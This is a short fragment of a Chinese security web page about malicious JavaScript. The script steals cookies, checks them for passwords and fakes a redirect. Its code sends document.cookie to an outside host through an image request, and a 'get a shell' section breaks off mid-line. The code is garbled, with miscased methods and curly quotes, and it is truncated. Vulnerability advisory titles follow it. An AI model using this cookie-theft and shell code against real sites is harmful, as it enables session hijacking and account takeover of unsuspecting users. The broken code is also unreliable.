js里可以写shell,添加用户,偷取cookie然后模拟出真正的转向
xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexof(‘password’)==-1?0:1;
tolocation=’https://www.jb51.net/’;
//get cookie
x=new image();
x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);
//get a shell
data=”txacontent=
如对本文有疑问, 点击进行留言回复!!
Microsoft Visio多个远程代码执行漏洞(MS08-019)
Microsoft Project资源内存分配远程代码执行漏洞(MS08-018)
Linux Audit audit_log_user_command 栈溢出漏洞
FoosunCMS Sql Injection Vulnerability
网友评论